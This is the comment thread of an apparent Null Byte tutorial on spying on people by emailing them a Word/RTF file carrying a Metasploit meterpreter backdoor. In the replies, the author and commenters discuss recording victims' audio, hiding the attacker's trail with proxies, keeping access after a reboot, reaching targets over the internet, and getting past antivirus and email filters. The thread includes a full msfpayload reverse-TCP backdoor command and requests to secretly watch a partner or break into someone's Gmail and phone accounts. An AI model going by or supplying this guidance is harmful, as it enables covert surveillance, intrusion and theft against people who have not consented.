Hack Like a Pro: How to Spy on Anyone, Part 1 (Hacking Computers)

Thanks, can I ask something?
Does it make any scent to trace somebody who does it?
if it does, how to cover the trace?

and how to stop the recording sound after enough to spy on?
Thankyou

Helper:

Are you asking me how we can trace the spy? There are many ways that I will address in future forensic posts. As for how to cover a trace, you can use proxies. Check out my post on use proxychains .

You can set up the sound recorder to only record for a limited amount of time. In addition, once the system is rebooted you will lose the listener. Finally, you can simply terminate the meterpreter at your end and the recording will end.

OTW

Ok. give me a minute and I'll send one right away.

hi can i ask you a question ???

did u get a mp4 video from OTW??or was it a joke

Very Useful tutorial!
A question please.. Will my payload run every time the machine starts?
or I should use this payload to upload a RAT's Trojan that has an option of auto startUp?

Thanka!

Urattacker:

No, as I have set it up here, the recorder will die when the machine reboots. You will need to set up the meterpreter with persistence to restart on reboot. Check out my post on persistence.

OTW

Can persistence be turned off?

can you please send me a message i want to talk to you in private ?? if you have time for me

shouldn't we also set the LPORT?

Yep, I quess OTW forgot it :I

thanks, very simple post.
now i need to learn what a multi-handler is.

Chris:

Metasploit' s multi handler is simply a module that will accept connections from many different payloads.

OTW

Since you don't know exactly when they will open the file, do you have to keep Kali running as it waits for the payload to execute?

But it is kinda inefficient to keep Kali running for 24 hours while you wait for them to open your email, isn't it?

In that case, is it possible to make the payload continuously attempt to connect to your system, so that when you boot Kali the next day (assuming the victim's computer is on), it will automatically connect to you?

This is a pretty cool post; thanks for sharing it!

It does that by default.

I don't understand the concept of inefficient? ? You are spying on someone and you are worried about energy consumption???

Dear OTW,

I want to ask princess' question in another way, is there any method for running time consuming scripts or waiting for connections in another computer with a higher speed and memory without the need to buy another computer? can we buy a VPS account from a host provider to do this? I would appreciate if you answer,since me and princess have some other works to do with our personal laptops besides hacking and meanwhile we don't wanna lose our connection with victim or stop our script!

Thanks in advance for your answer and also for every single of tutorials,you made me see a world I couldn't see before!

i have a question after saying exploit it writes that my file is stored in here /root/.msf4/local/lovepoem.rtf but i cant find it. so how can i send this with email ,while i cant find the document or word file? Or how can i find it?

I am also having same issue after running all the codes was wondering where the file is and will i attach it to the mail i'm sending

Dogaca:

The .msf directory is a hidden directory. Move the file to another directory and then attach it to an email.

OTW

dear OTW,
i have 2 VMs up, one is kali, and one is the target im using for practice.
how would i like, transfer the listner from VM to VM?

How about email? Or physically move it? Or a network share?

I opened up the file on a different pc to see if this was working but the meterpreter thingy never shows up ?

same issue , Did you find the solution...?

Hello i have a set of questions

First, i am using linux, which LHOST should i use, i have tried 127.0.0.1 and in the "Hack Like a Pro: How to Embed a Backdoor Connection in an Innocent-Looking PDF" tutorial it binded to the ip, but still after i sent the link to a vulnerable pc it didnt connect.

And how does the payload know how to contact the hackers pc if its in a remote location outside local network and i only provide LHOST?

Joao:

The 127.0.0.1 IP address is only for use internally on your system. You must use the external IP address such as 192.168.1.101.

OTW

Let him hack the localhost :)

But i tried to infect a pc on my network and also didnt work. So i have to set my external ip adress right? And the port?

There are many reasons why that may have failed. First and always, make sure you connectivity. If you are on the same network, use the private IP. If outside your network, use the public IP and port forwarding.

OTW

how do i set the port forwarding?

Joao:

I don't have a tutorial on it, but I'm sure someone has. Did you try googling it?

OTW

i did and i spent our trying to configure it, since i am in a linux virtual machine, havent suceeded yet but ill try again tomorrow. thanks ;)

Hello. I am having trouble launching metasploit. It just stays like that for a period of time and kali linux shuts down unexpectedly.

bro, if you're using the kali OS then go to applications, then go to kali linux, then go to top 10 security tools and the metasploit framework should be there

Are you running Kali Linux as a VM, or as an OS ?

thank you for help, but i got one more question, how do i move the file to another directory? is there a command for it?

Have you read my Linux tutorials? The Linux command is cp.

thanks again but there is a problem (again) i cant attach the file to email cause it says this file has virus it cannot be sent. by the way im using outlook. Do i need to change to another email? or is there another way?

and also sorry about bothering you with my questions. :D

Dogaca:

Because this attack has been around for awhile, the AV software recognizes it as a virus. You have a couple of options. One, find another way to send the file (physical or network share or another email system) or two, change the signature of the file. This is a bit more advanced and may not be appropriate for a beginner.

OTW

Hi I have done all the parts correctly but at the end when I want to send the file via email, I can't really find where it is stored. I tried /root/.msf4/local/FILENAME.rtf , it didn't work out.

Is there a way that I can change the directory?

Kiyar:

the .msf directory is hidden.

OTW

So basically how can I attach the .rtf file by email if it's all hidden. sorry to bother you with my questions.

When you are at "Home" press Ctrl+h It will show hidden files and folders.

Simply use the absolute path to the file. Even though the directory is hidden, it can still be acessed.

You can see any hidden directory by using ls -al.

by typing Is -al it only displays the hidden directory, how exactly can I bring it to my home directory? sorry for noobish question

Thank You so much OTW :)

Thank you very much for your tutorials,I'm happy I found you and this site! I've gone exactly according to this tutorial,the firewall on victim is off,the victim(myself on another computer in the local network) ran the file,is using office 2010,with windows 7 Ultimate(no sp installed) but my meterpreter session doesn't initialize,what am i missing?

hey im wanting to know if there some guides about coding, code that exploits and hacks use mostly

OTW

I have the same HOsein's problem any help please ? my meterpreter session doesn't initialize.

Hi OTW,
Thanks for all the great tutorials you keep making !

If I were using this to get into a computer on an external network, under LHOST do I enter my public IP or private IP ? And presuming I have port forwarding setup, would this work on any open port on the external network ? Finally, do I need to set LPORT ?

Thanks,
Luke

hi
i want to see whats she s doing exactly on her pc ..what the page that shs oppening and stuf not only to hear .
ty

Daniel:

I'll be doing more tutorials on the subject very soon, but in the meantime check out some of my other Metasploit tutorials here in Null Byte and check out thislist of scripts you can run from Metasploit.

OTW

Now i am pretty happy to go on exploring ahead using meterpreter i am just wondering, did you ever make a tutorial, or is there anywhere i can read about making something like a listener, but that starts up when the windows starts up. For example i manage to get the listener to the target once, and then even if the target shuts down his computer, the next time he starts it up i can connect up on the existing listener :) ?

Dejan:

Check out this article on making the listener persistent. In this way, whenever the victim reboots, the listener will reconnect to your computer.

OTW

Many thanks OTW, exacly what i was looking for!

if you transfer the file with usb ?

John:

Welcome to Null Byte!

I'm not sure I understand your question. Can you elaborate please?

OTW

Can we put data into the actual word file, so it's not so suspicious when it's opened

Yes, of course.

Send her a love poem. She'll love you for it.

Thanks man,

One more question how do we move the file into another directory so we can see it?

In Linux, you can use the mv (move) command.

Thanks so much OTW, enjoying all your tutorials, keep it up!

I figured out how to find and open the file, how do we add content to it? when I open it, it is just lots of line of code

Hi OTW,

I followed your instructions and generated the rtf file with the payload. When I add it to a Gmail as an attachment, Gmail exclaims that it is a virus and does not allow it to be sent. Is there anyway around this? Also, is there a way to save the file as a .doc or .docx so it looks like a real word file?

Thanks,
Matthew

how do I change the location of this file?

Which file?

Hello OTW,

Im having a problem. When I try to exploit it says "starting the payload handler". But then it's stuck. Im pretty sure that i've done all the commands correctly. Maybe it's due to running kali on a vm, idk..

Hope to hear from you!

Did she open the file?

yes she did open the file

Are you on the same network or did you enable portforwarding?

I'm on the same network as the victim's computer

Can you ping the victim?

yes i can ping the victim

OTW, what is the start port and end port should i used in port forwarding ?, thanks

Thanks for this tutorial bro...
when i create a backdoor with this command :
msfpayload windows/meterpreter/reversetcp LHOST=IP LPORT=4444 R x>/root/Desktop/bc.exe
and send it to victim , that work carefully !
but when i create file by this method and send him ... don't work! just file opened and echo into it "{" character!
Win: 7
Office: 2010
what's my problem? do you know?

What kind of file are you making? Your above command creates an executable file with a meterpreter backdoor.

i'm sorry ... can you help me?? :-)
I don't know why these problems happen to me really!!!!!!! :0

Has the patch been installed on the box? OTW posted a link in the article giving the details on the patch.

after the victim has opened the msword document with the embedded metasploit things. is there any message that i will recieve, just like the way RATs notefy you of any new connection, so that i can tell that the server has been been installed in the victims device? or what next?

You will get the meterpreter prompt on your computer like in the tutorial.

You can also make a small script to make a beeping noise if it detects you have a Meterpreter prompt, if you want that much.

The two main problems I see with this:

1) sending an rtf file would be suspicious. I don't more than 10% of users would even associate that file extension with MO.

2) It requires MO 2010, which is less of a problem because people tend to update infrequently.

.

Also, using Veil-Evasion I changed the signature of a known exploit (rev-tcp) as suggested in one of your tutorials. Can I just simply load this custom payload into any exploit? I rekon that if its possible, I must have the custom payload in the payload directories, right?

Thanks in advance!

Yes. He actually released a tutorial for this about a month ago right Here

Thank you!! That's great

How do you do this on Mac? If I'm not mistaken, this only works on windows...

This attack only works on Word on Windows.

Hey,

Thanks for such nice post, keep up the good work!

Wanted to ask which tcp port does the reverse tcp tunnel uses in order to connect me to the victim's machine?

Much Regards

Very nice post!
I know that it's possible do that without being in the victim network, but what configuration should I use to do that?

You need to use the target and your public IP's and port forward through your router.

it is deteted by the anti virus?

OTW, is anyway I can use to turn on the computer when it's powered off by using meterpreter or other ways?

Hi OTW
Im new at hacking and did everything you said
But i cant execute the "use exploid/multi/handler"
What would it be?

hey sorry maybe another noob question but can you give somemore detail on how to move the file cause it seems i cant do it?

thanx in advance

oooww well this is embarrassing
anyway thanks

Sorry to hijack this topic mr occupytheweb...but maybe someday you can do post focused on how things is exploit..for example...

Inside this topic you mention about ms14 - 017 exploit...maybe you can explain how the creator of this exploit do it...I mean in a really technical detail...

just want to ask, Is this legit? I'm sorry if I ask that. I just want to be sure that this is not scam. Thank you. :)

yeah this is legit.

I'm curious as to how to find my file when I create it as it does not pop up in my root folder

Did you put it in your root folder?

Thanks for your fast reply! And I'll just send you an attachment with my problem.

I cannot find my file. I've also tried going through your basics. As seen in the next two images.

(Rest of terminal below)

I appreciate you helping me. :)

It tells you in the second screenshot that your file is in .//msf5/local/Resume.rtf. You need to use that path in your exploit.

Thanks again but how exactly do I use the path?, I tried finding the folder where the file is located, but had no luck. Sorry for asking so much.

You found it with th efind command. It's at /.msf5/local/Resume.rtf

When you use Metasploit simply use the full path to that document.

Oh seriously? Thanks, how would I go about sending the file tho? And I mean I can't find the directory it gave me.

Also when I search for the file on my computer I only get these, In which I don't think any of them are the file as they do not have ".rtf" after the name "Resume" (Filename of my choice)

The directory you put it in, /.msf5 is a hidden directory. Move to your desktop and use it from there.

Thanks again, Yeah I was able to transfer the file from the hidden folder to my documents! :D

hi i did all the instuctions , my friend did open that file but the meterpreter did not show up o.O what shall i do , help me plz

Do the computers have to be on the same network?

i am sure that i followed all the steps perfectly but the meterpreter prompt wont appear

hello
may i know how to hack a pc with its ip address because i can not send him a mail but i know his pc ip address

Hello! I am new to metasploit. I am using Armitage because I couldn't find normal metasploit on the desktop. Anyway, it says that theres a problem with INFILENAME. I already defined it. Help?

@OCCUPYTHEWEB that is not an external IP address.

I just get endless SSL erros from outside networks.

chief ,here I use my public iddress as LHOST as the victim is not in my LAN network but i didn't get the meterpreter console when he opened the rtf file???

pl help

Hello all,

Looking for some serious help in a short period of time. Is there any way someone can do this for me? I am deadlocked and stuck. I need to get into someone's gmail account. I would also like to get into their Sprint account to get call logs and texts. Is this possible without them finding out or asking permission? I know that if I send a pic attachment of my son, they'll open it. So that kinda solves the email, but what about the phone account?

Thanks.

how does this translate if the "computer" i want to hack is a smartphone?

the software told me that the exploit failed

did anyone else not click anything after reading the beginning of step 2?

i can't find the file to email

Hi OTW,
First of all thank you for the session.

I Have the following issue:
I am unable to get the meterpeter session, even after victim opening the exploited file.
Please help me to resolve this issue...?